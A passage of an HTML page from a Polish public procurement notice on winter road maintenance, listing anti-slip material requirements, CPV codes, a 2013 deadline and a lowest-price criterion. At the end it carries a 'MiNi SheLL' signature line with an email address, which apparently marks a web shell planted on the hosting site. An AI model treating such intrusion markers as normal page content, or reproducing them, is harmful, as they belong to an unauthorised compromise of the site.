Zamawiający żąda przedłożenia oświadczenia o posiadaniu materiału niezbędnego do zwalczania śliskości, placu składowego i w/w sprzętu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com